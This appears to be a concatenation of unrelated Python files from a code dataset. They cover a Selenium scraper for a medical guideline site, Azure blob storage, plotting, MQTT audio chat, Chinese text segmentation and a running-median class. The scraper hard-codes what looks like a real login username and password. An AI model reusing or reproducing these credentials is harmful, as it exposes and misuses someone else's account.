webdriver.ChromeOptions()\noption.add_experimental_option('prefs',prefs)\n# option.add_argument(\"--start-maximized\")\n#实例化对象时,将设置的Firefox参数传入\nbrowser = webdriver.Chrome(options=option)\n\ndef is_have_next_page(soup_url):\n # 登陆账号\n browser.get(\n 'http://www.medlive.cn/auth/login?service=http%3A%2F%2Fguide.medlive.cn%2Fguideline%2Flist%3Ftype%3Dguide%26sort%3Dpublish%26year%3D0%26branch%3D0')\n sleep(1)\n browser.find_element_by_class_name('login-rightTab').click()\n # 输入账号密码\n browser.find_element_by_id('username').send_keys(\"18610229039\")\n sleep(1)\n browser.find_element_by_id('password').send_keys(\"891655\")\n sleep(1)\n # 单击登录按钮\n browser.find_element_by_id('loginsubmit').click()\n sleep(1)\n # 跳到科室页面刷数据\n browser.get(soup_url)\n sleep(1)\n browser.execute_script(\"\"\"\n (function () {\n var y = 0;\n var winHeight = window.innerHeight;\n var step = 210;\n window.scroll(0, 0);\n function f() {\n if (y <= document.body.scrollHeight) {\n y += step;\n window.scroll(0, y);\n setTimeout(f, 100);\n } else {\n window.scroll(0, 0);\n document.title += \"scroll-done\";\n }\n }\n setTimeout(f, 1000);\n })();\n \"\"\")\n print(\"下拉中...\")\n while True:\n if \"scroll-done\" in browser.title:\n break\n else:\n print(\"还没有拉到最底端...\")\n\n # # url链接\n # url = 'http://guide.medlive.cn/guideline/list?type=guide&year=0&sort=publish&branch=1'\n # response = requests.get(url, headers=header)\n #\n # 通过BeautifulSoup进行解析出每个房源详细列表并进行打印\n soup = BeautifulSoup(browser.page_source, 'html.parser')\n result_input = soup.find_all('input', {'class': 'btn select'})\n print(result_input[0].get('value'))\n result_p = soup.find_all('p', {'class': 'guide_title'})\n soup_p = BeautifulSoup(str(result_p), 'lxml')\n result_a = soup_p.find_all('a')\n print(len(result_a))\n for i in result_a:\n get_page_detail(i.get('href'))\n browser.quit()\n\n#爬取页面想要的数据\ndef get_page_detail(url):\n try:\n browser.get(url)\n browser.find_element_by_link_text('下载').click()\n except:\n print(url)\n\n\n\nif __name__ == '__main__':\n is_have_next_page('http://guide.medlive.cn/guideline/list?type=guide&year=0&sort=publish&branch=1')\n\n\n\n\n","sub_path":"com/down_pdf/getDataPdfOneSubject.py","file_name":"getDataPdfOneSubject.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"28956032","text":"from azure.storage.blob import BlobServiceClient\nfrom django.conf import settings\nimport os\n\n\nclass AzureBlob:\n def __init__(self):\n credential = os.environ[\"CREDENTIALS\"]\n account_url = os.environ[\"ACCOUNT\"]\n container = os.environ[\"CONTAINER\"]\n blob = os.environ[\"BLOB\"]\n\n service = BlobServiceClient(account_url=account_url, credential=credential)\n self.blob = service.get_blob_client(container=container, blob=blob)\n\n def download(self, write_to_file):\n blob_data = self.blob.download_blob()\n blob_data.readinto(write_to_file)\n\n def upload(self, data):\n self.blob.upload_blob(data, overwrite=True)\n","sub_path":"business_app/services/cloud.py","file_name":"cloud.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"517315279","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndata = pd.read_csv('../lipids.csv', header=4)\n\ndiseased_data = data[data['diseased'] == 1]\n\nweights = (1 / len(diseased_data['chol'])) * np.ones_like(diseased_data['chol'])\n\nn, bin_cuts, patches = plt.hist(diseased_data['chol'], 25, weights=weights)\n\nplt.xlabel('concentration of plasma cholesterol (mg/dl)')\nplt.ylabel('frequency')\nplt.title('2D Histogram')\n\nplt.show()\n\nleft_cut = np.argmax(n)\n\nmidpoint = (bin_cuts[left_cut + 1] + bin_cuts[left_cut]) / 2\n\nprint(midpoint)\n\n#3D plot\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection ='3d')\nbin_num = 25\nhist, xedges, yedges = np.histogram2d(diseased_data['chol'], diseased_data['trig'], bins=bin_num)\nhist = hist / hist.sum()\nx_midp = xedges[:-1] + 0.5 * (xedges[1] - xedges[0])\ny_midp = yedges[:-1] + 0.5 * (yedges[1] - yedges[0])\nelements = (len(xedges) - 1) * (len(yedges) - 1)\nypos, xpos = np.meshgrid(y_midp, x_midp)\nxpos = xpos.flatten()\nypos = ypos.flatten()\nzpos = np.zeros(elements)\ndx = (xedges[1] - xedges[0]) * np.ones_like(bin_num)\ndy = (yedges[1] - yedges[0]) * np.ones_like(bin_num)\ndz = hist.flatten()\nax.bar3d(xpos, ypos, zpos, dx, dy, dz, color='b', zsort='average')\nax.set_xlabel('concentration of plasma cholesterol (mg/dl)')\nax.set_ylabel('concentration of plasma triglicerides (mg/dl)')\nax.set_zlabel('frequency')\nplt.title('3D Histogram')\n\nprint('While the individuals appear to have fairly normal cholesterol levels (~200 mg/dl), they tend to have fairly high trigliceride levels (>150 mg/dl).'\n\t'This could be the reason why they have some form of heart disease.'\n\t'I would say that groups with high trigliceride levels have the highest risk for heart disease.')\n\nplt.show()","sub_path":"Computation/Wk2_VisPandas/Wk2_Probs/3D_hist.py","file_name":"3D_hist.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"571063947","text":"from env import SELENIUM_GRID_HUB, platform, APPIUM_STANDALONE, APP_BASE_URL\n\nSELENIUM_HUB = SELENIUM_GRID_HUB if 'ios' not in platform else APPIUM_STANDALONE\n\nif 'ios' in platform:\n CAPABILITIES = {\n 'platformName': 'iOS',\n 'platformVersion': '9.2',\n 'browserName': 'Safari',\n 'deviceName': 'iPad Air 2',\n 'safariIgnoreFraudWarning': True,\n # 'nativeWebTap': True,\n 'nonSyntheticWebClick': False,\n }\nelse:\n CAPABILITIES = {\n 'platformName': 'MAC',\n 'browserName': 'firefox'\n }","sub_path":"app/tests/functional/bootstrap/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"428301049","text":"import os, sys, glob\nimport utilities\n\ninFilePath = sys.argv[1]\nfindValue = sys.argv[2].decode('string-escape')\nreplaceValue = sys.argv[3].decode('string-escape')\noutFilePath = sys.argv[4]\n\ntext = utilities.readTextFromFile(inFilePath)\ntext = text.replace(findValue, replaceValue)\nutilities.writeScalarToFile(text, outFilePath)\n","sub_path":"code/ReplaceText.py","file_name":"ReplaceText.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"192127740","text":"#!/usr/bin/python3\n\nimport sys\nimport re\n\ndef revcomp(seq):\n rev = seq[::-1]\n return rev.translate(str.maketrans(\"ATGC\",\"TACG\"))\n\npattern = re.compile(\"([ATGC]+)\")\n\nfasta = open(sys.argv[1], \"r\")\nquery = dict()\nfor i in fasta:\n\tif i.startswith(\">\"):\n\t\tidx = i[1:].rstrip()\n\telse:\n\t\tquery[idx] = i.rstrip()\nfasta.close()\n\npatman = open(sys.argv[2], \"r\")\nfor i in patman:\n\tfields = i.split(\"\\t\")\n\tmatch = pattern.search(fields[1])\n\tif match:\n\t\tseq = match.group(1)\n\t\tif fields[4] == \"-\":\n\t\t\tseq = revcomp(seq)\n\t\tif seq == query[fields[0]]:\n\t\t\tprint(i,end=\"\")\n\telse:\n\t\tprint(\"ID not found\", file=sys.stderr)\npatman.close()\n","sub_path":"filter_by_query.py","file_name":"filter_by_query.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"194014488","text":"import random\n\n#Se hace promoción aleatoria, supongo que entre 0 y 100\n#Si es menor a 74, descontamos 15\n#Si es mayor o igual, descontamos 20%\n#Debemos imprimir cuando descontamos\n#Solamente pide obtener el dinero que se decuenta\n\nrifa = random.randint(0, 100)\nprecio = int(input('Ingrese el total de su compra \\t'))\ndescuento = 0\n\n\nif rifa < 74:\n descuento = precio * 0.15\n print(f'El descuento es {descuento}')\nelse:\n descuento = precio * 0.20\n print(f'El descuento es {descuento}')\n\n","sub_path":"Estructuras Condicionales/Para que sigas practicando/13_descuento_azar.py","file_name":"13_descuento_azar.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"418470701","text":"try:\r\n import argparse\r\nexcept ImportError:\r\n print(\"Please check if module 'argparse' is installed\")\r\n quit()\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('--csinensis', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of C.sinensis phylostratigraphy analysis\")\r\nparser.add_argument('--psimillimum', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of P.simillimum phylostratigraphy analysis\")\r\nparser.add_argument('--fhepatica', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of F.hepatica phylostratigraphy analysis\")\r\nparser.add_argument('--fgigantica', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of F.gigantica phylostratigraphy analysis\")\r\nparser.add_argument('--ofelineus', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of O.felineus phylostratigraphy analysis\")\r\nparser.add_argument('--oviverrini', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of O.viverrini phylostratigraphy analysis\")\r\nparser.add_argument('--shaematobium', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of S.haematobium phylostratigraphy analysis\")\r\nparser.add_argument('--sjaponicum', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of S.japonicum phylostratigraphy analysis\")\r\nparser.add_argument('--smansoni', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of S.mansoni phylostratigraphy analysis\")\r\nparser.add_argument('--tregenti', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of T.regenti phylostratigraphy analysis\")\r\nparser.add_argument('--tszidati', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of T.szidati phylostratigraphy analysis\")\r\nparser.add_argument('--smediterranea', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of S.mediterranea phylostratigraphy analysis\")\r\nparser.add_argument('--mlignano', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of M.lignano phylostratigraphy analysis\")\r\nparser.add_argument('--pvittatus', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of P.vittatus phylostratigraphy analysis\")\r\nparser.add_argument('--levels', type=argparse.FileType('r'), required=True,\r\n help=\"Table with description of phylostratigraphic levels\")\r\nparser.add_argument('--output', type=str, required=True)\r\nargs = parser.parse_args()\r\n\r\n\r\ndef phylostratr_table_parsing(table, species_dict):\r\n header = table.readline()\r\n for line in table:\r\n description = line.strip().split(\"\\t\")\r\n protein_ID, mrca, ps, mrca_name = description[0][1:-1], description[1], description[2], description[3][1:-1]\r\n if mrca_name not in species_dict.keys():\r\n species_dict[mrca_name] = []\r\n species_dict[mrca_name].append(protein_ID)\r\n\r\n\r\ndef levels_parsing(levels, levels_dict):\r\n for line in levels:\r\n description = line.strip().split(\"\\t\")\r\n levels_dict[description[0][1:-1]] = description[1]\r\n\r\n\r\ndef merge_results(merged_dict, levels, ordered_levels, csinensis_dict, fgigantica_dict, fhepatica_dict,\r\n mlignano_dict, ofelineus_dict, oviverrini_dict, psimillimum_dict, pvittatus_dict,\r\n shaematobium_dict, sjaponicum_dict, smansoni_dict, smediterranea_dict,\r\n tregenti_dict, tszidati_dict):\r\n species_dicts = {\"Csinensis\": csinensis_dict, \"Fgigantica\": fgigantica_dict, \"Fhepatica\": fhepatica_dict,\r\n \"Mlignano\": mlignano_dict, \"Ofelineus\": ofelineus_dict, \"Oviverrini\": oviverrini_dict,\r\n \"Psimillimum\": psimillimum_dict, \"Pvittatus\": pvittatus_dict,\r\n \"Shaematobium\": shaematobium_dict, \"Sjaponicum\": sjaponicum_dict, \"Smansoni\": smansoni_dict,\r\n \"Smediterranea\": smediterranea_dict, \"Tregenti\": tregenti_dict, \"Tszidati\": tszidati_dict}\r\n\r\n for level in ordered_levels:\r\n merged_dict[level] = {\"Csinensis\": [], \"Fgigantica\": [], \"Fhepatica\": [], \"Mlignano\": [],\r\n \"Ofelineus\": [], \"Oviverrini\": [], \"Psimillimum\": [], \"Pvittatus\": [],\r\n \"Shaematobium\": [], \"Sjaponicum\": [], \"Smansoni\": [], \"Smediterranea\": [],\r\n \"Tregenti\": [], \"Tszidati\": []}\r\n\r\n for species, species_dict in species_dicts.items():\r\n protein_number = 0\r\n for mrca_name, proteins in species_dict.items():\r\n merged_dict[levels[mrca_name]][species].append(len(proteins))\r\n protein_number += len(proteins)\r\n # append per cents\r\n for level in merged_dict.keys():\r\n if len(merged_dict[level][species]) != 0:\r\n merged_dict[level][species].append((int(merged_dict[level][species][0])/protein_number)*100)\r\n else:\r\n merged_dict[level][species].extend([0, 0])\r\n\r\n\r\ndef write_output(output, ordered_levels, merged_dict):\r\n with open(\"{output}.phylostratr_summary.tsv\".format(output=output), 'a') as phylostratr_summary:\r\n phylostratr_summary.write(\"Levels\\tCsinensis\\tFgigantica\\tFhepatica\\tMlignano\\tOfelineus\\t\"\r\n \"Oviverrini\\tPsimillimum\\tPvittatus\\tShaematobium\\tSjaponicum\\tSmansoni\\t\"\r\n \"Smediterranea\\tTregenti\\tTszidati\\n\")\r\n for level in ordered_levels:\r\n values = [\"{num}({percent}%)\".format(num=merged_dict[level][species][0],\r\n percent=round(merged_dict[level][species][1], 2)) for species in\r\n [\"Csinensis\", \"Fgigantica\", \"Fhepatica\", \"Mlignano\", \"Ofelineus\", \"Oviverrini\", \"Psimillimum\",\r\n \"Pvittatus\", \"Shaematobium\", \"Sjaponicum\", \"Smansoni\", \"Smediterranea\", \"Tregenti\", \"Tszidati\"]]\r\n phylostratr_summary.write(\"{level}\\t{values}\\n\".format(level=level, values=\"\\t\".join(values)))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n ordered_levels = [\"Cellular_organisms\", \"Eukaryota\", \"Opisthokonta\", \"Metazoa\", \"Eumetazoa\", \"Bilateria\",\r\n \"Protostomia\", \"Spiralia\", \"Lophotrochozoa\", \"Platyhelminthes\", \"Class\",\r\n \"Order\", \"Family\", \"Genus\", \"Species\"]\r\n csinensis_dict, fgigantica_dict, fhepatica_dict, mlignano_dict, ofelineus_dict, oviverrini_dict, psimillimum_dict, \\\r\n pvittatus_dict, shaematobium_dict, sjaponicum_dict, smansoni_dict, smediterranea_dict, tregenti_dict, \\\r\n tszidati_dict = {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}\r\n levels_dict, merged_dict = {}, {}\r\n print(\"***** Input files parsing *****\")\r\n phylostratr_table_parsing(args.csinensis, csinensis_dict)\r\n phylostratr_table_parsing(args.fgigantica, fgigantica_dict)\r\n phylostratr_table_parsing(args.fhepatica, fhepatica_dict)\r\n phylostratr_table_parsing(args.mlignano, mlignano_dict)\r\n phylostratr_table_parsing(args.ofelineus, ofelineus_dict)\r\n phylostratr_table_parsing(args.oviverrini, oviverrini_dict)\r\n phylostratr_table_parsing(args.psimillimum, psimillimum_dict)\r\n phylostratr_table_parsing(args.pvittatus, pvittatus_dict)\r\n phylostratr_table_parsing(args.shaematobium, shaematobium_dict)\r\n phylostratr_table_parsing(args.sjaponicum, sjaponicum_dict)\r\n phylostratr_table_parsing(args.smansoni, smansoni_dict)\r\n phylostratr_table_parsing(args.smediterranea, smediterranea_dict)\r\n phylostratr_table_parsing(args.tregenti, tregenti_dict)\r\n phylostratr_table_parsing(args.tszidati, tszidati_dict)\r\n levels_parsing(args.levels, levels_dict)\r\n print(\"***** Results merging *****\")\r\n merge_results(merged_dict, levels_dict, ordered_levels, csinensis_dict, fgigantica_dict, fhepatica_dict,\r\n mlignano_dict, ofelineus_dict, oviverrini_dict, psimillimum_dict, pvittatus_dict,\r\n shaematobium_dict, sjaponicum_dict, smansoni_dict, smediterranea_dict, tregenti_dict, tszidati_dict)\r\n print(\"***** Output creating *****\")\r\n write_output(args.output, ordered_levels, merged_dict)\r\n","sub_path":"Flatworms_phylostratr_summary.py","file_name":"Flatworms_phylostratr_summary.py","file_ext":"py","file_size_in_byte":8398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"344757061","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport pylab as plt\nimport netCDF4\nimport datetime\n\n\"\"\"\nComparing forcing data from AROME MetCOOP model and the gridded observational data.\n\nAuthor: kmunve\n\n\"\"\"\n\narome_f = \"../Test/Data/FORCING_arome.nc\"\nobsgrid_f = \"../Test/Data/FORCING_obsgrid.nc\"\n\n\n#N = 35360\nN = 64197\n\narome_nc = netCDF4.Dataset(arome_f, 'r')\nobsgrid_nc = netCDF4.Dataset(obsgrid_f, 'r')\n\n\n###\n# AROME #\n###\n\na_lat_v = arome_nc.variables['LAT']\na_lon_v = arome_nc.variables['LON']\n\na_masl_v = arome_nc.variables['ZS']\n\na_ta_v = arome_nc.variables['Tair']\na_rr_v = arome_nc.variables['Rainf']\na_sf_v = arome_nc.variables['Snowf']\na_time_v = arome_nc.variables['time']\n\na_t = a_time_v[:]#netCDF4.num2date(a_time_v[:], a_time_v.units)\na_ta = a_ta_v[:, N]\na_rr = a_rr_v[:, N]\na_sf = a_sf_v[:, N]\n\n\n####\n# OBSGRID\n####\n\n\no_lat_v = obsgrid_nc.variables['LAT']\no_lon_v = obsgrid_nc.variables['LON']\n\no_masl_v = obsgrid_nc.variables['ZS']\n\no_ta_v = obsgrid_nc.variables['Tair']\no_rr_v = obsgrid_nc.variables['Rainf']\no_sf_v = obsgrid_nc.variables['Snowf']\no_time_v = obsgrid_nc.variables['time']\n\no_t = o_time_v[:]#netCDF4.num2date(o_time_v[:], o_time_v.units)\no_ta = o_ta_v[:, N]\no_rr = o_rr_v[:, N]\no_sf = o_sf_v[:, N]\n\n#t_width = datetime.timedelta(minutes=30)\nwidth = 0.25\n\nf, axarr = plt.subplots(3, sharex=True)\nplt.hold(True)\naxarr[0].axhline(273.65, color='k', linestyle=\"--\")\naxarr[0].plot(o_t, o_ta, color='r')\naxarr[0].plot(a_t, a_ta, color='b')\naxarr[0].set_title(\"OBSGRID coords: {0}, {1}\\nAROME coords: {2}, {3}\".format(o_lat_v[N], o_lon_v[N], a_lat_v[N], a_lon_v[N]))\naxarr[0].set_ylabel(\"Temperature\")\n\naxarr[1].bar(o_t+width, o_rr, width=width, color='r')\naxarr[1].bar(a_t, a_rr, width=width, color='b')\naxarr[1].set_ylabel(\"Rainfall rate\")\n\naxarr[2].bar(o_t+width, o_sf, width=width, color='r')\naxarr[2].bar(a_t, a_sf, width=width, color='b')\naxarr[2].set_ylabel(\"Snowfall rate\")\nplt.show()\n","sub_path":"Crocus/obsgrid_vs_arome_forc.py","file_name":"obsgrid_vs_arome_forc.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"49925694","text":"import paho.mqtt.client as paho\nimport logging\nfrom brokerData import * #MANU Informacion de la conexion\nimport os \n#MANU Nombres de Topics \nUSUARIOS = 'usuarios'\nSALAS = 'salas'\nAUDIO = 'audio'\nGRUPO = '27'\n#MANU Handler en caso suceda la conexion con el broker MQTT\ndef on_connect(client, userdata, flags, rc): \n connectionText = \"CONNACK recibido del broker con codigo: \" + str(rc)\n logging.info(connectionText)\n\n#MANU Handler en caso se publique satisfactoriamente en el broker MQTT\ndef on_publish(client, userdata, mid): \n publishText = \"Publicacion satisfactoria\"\n logging.debug(publishText)\n\n#MANU Callback que se ejecuta cuando llega un mensaje al topic suscrito\ndef on_message(client, userdata, msg):\n from datetime import datetime\n #MANU Se muestra en pantalla informacion que ha llegado\n logging.info(\"Fuente: \" + str(msg.topic))\n firstopic = '{:.5}'.format(str(msg.topic))\n if firstopic == 'audio':#AAMS Se compara si el mensaje llegado fue de Audio o Texto\n now = datetime.now()\n name_ar = str(int(datetime.timestamp(now))) + '.wav' #AAMS Nombre del archivo de audio para el receptor del mismo\n archivo = open(name_ar,'wb') #AAMS Abrir para SOBREESCRIBIR el archivo existente\n a = msg.payload\n archivo.write(a) #AAMS Sobreescribiendo el archivo de audio\n archivo.close() #AAMS Siempre cerrar el archivo al finalizar la escritura\n escuchar = 'aplay ' + name_ar\n os.system(escuchar) #AAMS Reproduccion del archivo de audio\n print(\"ENVIAR TEXTO = 1 \\nENVIAR AUDIO = 2 \\nSeleccion:\")\n else:\n logging.info(\"\\n1 Mensaje Recibido: \" + str(msg.payload))\n print(\"ENVIAR TEXTO = 1 \\nENVIAR AUDIO = 2 \\nSeleccion:\")\n \nclient = paho.Client(clean_session=True) #MANU Nueva instancia de cliente\nclient.on_connect = on_connect #MANU Se configura la funcion \"Handler\" cuando suceda la conexion\nclient.on_message = on_message #MANU Se configura la funcion \"Handler\" que se activa al llegar un mensaje a un topic subscrito\nclient.on_publish = on_publish #MANU Se configura la funcion \"Handler\" que se activa al publicar algo\nclient.username_pw_set(MQTT_USER, MQTT_PASS) #MANU Credenciales requeridas por el broker\nclient.connect(host=MQTT_HOST, port = MQTT_PORT) #MANUConectar al servidor remoto\n\ndef publishData(topicRoot, topicName, value, qos = 0, retain = False): #MANU Funcion para recibir topics y publicarlos\n topic = topicRoot + \"/\" + topicName\n client.publish(topic, value, qos, retain)\n\ndef fileReadU(fileName = 'usuario'):#MANU leer el archivo de texto plano\n archivo = open(fileName,'r') #MANU Abrir el archivo en modo de LECTURA\n for line in archivo: #MANU Leer cada linea del archivo\n usuario = (line) #MANU Guardar el texto de USUARIO\n return usuario\n archivo.close()\n\ndef fileReadS(fileName = 'salas'):#MANU leer el archivo de texto plano\n archivo = open(fileName,'r') #MANU Abrir el archivo en modo de LECTURA\n sala = []\n for line in archivo: #MANU Leer cada linea del archivo\n sala.append('{:.3}'.format(line)) #MANU lista de SALAS \n return sala\n archivo.close()\n\n\ndef fileReadAU(fileName = 'prueba.wav'):#AAMS Creacion el archivo de audio local\n tiempo = input('Duracion: ')\n if int(tiempo) > 30:#AAMS Limitacion del tiempo a solo 30 segundos maximo\n print('El mensaje No debe ser mayor a 30 Segundos')\n else:\n comando = 'arecord -d' + tiempo + ' -f U8 -r 8000 prueba.wav'\n logging.info('Comenzando grabacion')\n os.system(comando)\n logging.info('Grabacion finalizada')\n archivo = open(fileName,'rb') #AAMS Abrir el archivo en modo de LECTURA\n for line in archivo: #AAMS Leer cada linea del archivo\n a = line #AAMS Guardar el texto del archivo leido\n return a\n archivo.close() #AAMS Cerrar el archivo al finalizar\n \n#OOP[PARA CLIENTES]\nclass texto(object): #MANU CLASE PARA EL MANEJO DE LA INTERFAZ DEL CLIENTE\n def __init__(self, MENU1):#MANU CONSTRUCTOR\n self.MENU1 = str(MENU1)\n\n\n \n def menu(self):\n estado = 0\n if str(self.MENU1) == '1':#AAMS El usuario desea enviar texto\n MENU2 = input(\"ENVIAR A USUARIO = 1 \\nENVIAR A SALA = 2 \\nSeleccion:\\n\")\n if MENU2 == '1': # AAMS el Usuario desea enviar texto a un usuario\n DESTINO = input(\"Destinatario/Usuario: \\n\")\n texto_enviar = input(\"Escribir mensaje: \\n\")\n publishData(USUARIOS, GRUPO + \"/\" + DESTINO , texto_enviar)\n logging.info(\"Mensaje enviado\\n\")\n if MENU2 == '2':# AAMS el usuario desea enviar texto a una sala\n DESTINO = input(\"Destinatario/#Sala: \\n\")\n texto_enviar = input(\"Escribir mensaje: \\n\")\n publishData(SALAS, GRUPO + \"/\" + DESTINO , texto_enviar)\n logging.info(\"Mensaje enviado\\n\")\n estado = 0 #AAMS El while principal seguira funcionando\n return estado\n if str(self.MENU1) == '2': # AAMS El usuario desea enviar un audio\n MENU2 = input(\"ENVIAR A USUARIO = 1 \\nENVIAR A SALA = 2 \\nSeleccion:\\n\")\n if MENU2 == '1':#AAMS El usuario desea enviar un audio a un usuario\n DESTINO = input(\"Destinatario/Usuario: \\n\")\n textob = fileReadAU()\n if textob != None:\n publishData(AUDIO, GRUPO + \"/\" + DESTINO , textob)\n logging.info(\"Mensaje enviado\\n\")\n if MENU2 == '2':#AAMS El usuario desea enviar un audio a una sala\n DESTINO = input(\"Destinatario/#Sala: \\n\")\n textob = fileReadAU()\n publishData(AUDIO, GRUPO + \"/\" + DESTINO , textob)\n logging.info(\"Mensaje enviado\\n\")\n estado = 0#AAMS El while principal seguira funcionando\n return estado\n if str(self.MENU1) == '3':#AAMS El usuario desea cerrar su sesion\n estado = 1#AAMS El while principal dejara de funcionar\n return estado\n \n \n\n ","sub_path":"cliente3/clienteclass.py","file_name":"clienteclass.py","file_ext":"py","file_size_in_byte":6071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"72667087","text":"import pickle\nimport jieba\nimport progressbar\nimport csv\n\n\ndef jieba_cut(boardname, filename):\n bar = progressbar.ProgressBar(max_value=progressbar.UnknownLength)\n ptt = pickle.load(open(\"/home/ptt/ptt_{}_{}.txt\".format(boardname, filename), \"rb\"))\n jieba.load_userdict(\"for_jieba_seasoning.txt\")\n\n\n total_page = len(ptt)\n start = 0\n end = 20000\n\n page_count = 0\n\n while True:\n for content in ptt[start:end]:\n seg_list = list(jieba.cut(content[-1], cut_all=False))\n content.append(seg_list)\n page_count += 1\n bar.update(page_count)\n\n pickle.dump(ptt, open(\"ptt_{}_text_jieba_pickle.txt\".format(boardname), \"wb\"))\n\n f = open('ptt_{}_text_jieba.csv'.format(boardname), 'w')\n w = csv.writer(f)\n w.writerows(ptt)\n f.close()\n\n if end == total_page:\n break\n\n start += 20000\n end += 20000\n if end > total_page:\n end = total_page\n\n ptt = pickle.load(open(\"ptt_{}_text_jieba_pickle.txt\".format(boardname), \"rb\"))\n","sub_path":"jieba_cut.py","file_name":"jieba_cut.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"428234335","text":"\"\"\"Output running medians for the number of words per line.\n\n\"\"\"\n__author__ = 'yun'\n\nimport optparse\nimport heapq\n\nimport util\n\n\nclass RunningMedian(object):\n \"\"\"A class to get the running median of a data stream.\n\n Takes O(u) as space complexity, where u is the number of UNIQUE elements\n in the data stream so far.\n\n Algorithmically, I use a max heap to store the elements NO greater than the\n median, and a min heap to store the elements greater than the median. In\n order to shrink the space, the elements in the heaps are stored as follows:\n\n (number, [occurrences]) e.g.\n (4, [27]) means the number 4 occurred 27 times in the data stream\n\n Additionally a hash table is used in order to look up an entry in constant\n time. Both the heaps and the hash table are of size u, where u is the\n number of UNIQUE elements in the data stream so far.\n\n In order to use python library heapq (which supports only min heap), I\n store negative numbers in the max heap, and positive numbers in the min\n heap.\n\n We keep balance between the size of max heap and min heap so that it takes\n O(1) to get the medians.\n\n \"\"\"\n def __init__(self):\n self.lookup_table = {}\n self.max_heap = []\n self.min_heap = []\n self.max_heap_size = 0\n self.min_heap_size = 0\n\n def get_median(self):\n \"\"\"Get the current median. If the number of elements in the data stream\n is even, get the average of the two medians.\n\n Takes O(1) as time complexity.\n\n Algorithmically, because the number of elements in the max heap and min\n heap are (almost) the same. We just need to pop elements from the heap.\n\n :return: A float number of the current median.\n \"\"\"\n if not self.max_heap and not self.min_heap:\n return 0\n if self.max_heap_size > self.min_heap_size:\n neg_median, _ = self.max_heap[0]\n return - neg_median\n elif self.max_heap_size < self.min_heap_size:\n pos_median, _ = self.min_heap[0]\n return pos_median\n else:\n neg_median, _ = self.max_heap[0]\n pos_median, _ = self.min_heap[0]\n return (pos_median - neg_median) / 2\n\n def balance(self):\n \"\"\"Move an entry from one heap to another if the difference in heap\n sizes become smaller after the move.\n\n Takes O(lg(u)) as time complexity, where u is the number of UNIQUE\n elements in the data stream so far.\n\n Algorithmically, check if the difference in heap sizes is greater than\n the size of the top element in the larger heap. If yes, move the top\n element from the larger heap to the smaller heap. The insertion to a\n heap of size u takes O(lg(u)).\n\n \"\"\"\n if self.max_heap:\n _, occurrence = self.max_heap[0]\n if self.max_heap_size >= self.min_heap_size + occurrence[0]:\n number, occurrence = heapq.heappop(self.max_heap)\n heapq.heappush(self.min_heap, (- number, occurrence))\n self.max_heap_size -= occurrence[0]\n self.min_heap_size += occurrence[0]\n\n if self.min_heap:\n _, occurrence = self.min_heap[0]\n if self.max_heap_size < self.min_heap_size - occurrence[0]:\n number, occurrence = heapq.heappop(self.min_heap)\n heapq.heappush(self.max_heap, (- number, occurrence))\n self.max_heap_size += occurrence[0]\n self.min_heap_size -= occurrence[0]\n\n def put(self, elem):\n \"\"\"Put an element into the data stream.\n\n Takes O(lg(u)) as time complexity, where u is the number of UNIQUE\n elements in the data stream so far.\n\n Algorithmically, if the element has occurred before, we only need to\n update its number of occurrence. If it is an element we have seen for\n the first time, we need to\n (1) Insert it into the hash table (Takes O(1))\n (2) Insert the same entry into the max or min heap (depend on whether\n the element is greater than the median) (Takes O(lg(u)))\n (3) Rebalance once. (Takes O(lg(u)))\n\n :param elem: The element to put into the data stream\n \"\"\"\n if elem in self.lookup_table:\n if elem < self.get_median():\n self.max_heap_size += 1\n else:\n self.min_heap_size += 1\n\n _, number_occurrence = self.lookup_table[elem]\n number_occurrence[0] += 1\n else:\n if elem <= self.get_median():\n self.lookup_table[elem] = (- elem, [1])\n heapq.heappush(self.max_heap, self.lookup_table[elem])\n self.max_heap_size += 1\n else:\n self.lookup_table[elem] = (elem, [1])\n heapq.heappush(self.min_heap, self.lookup_table[elem])\n self.min_heap_size += 1\n\n 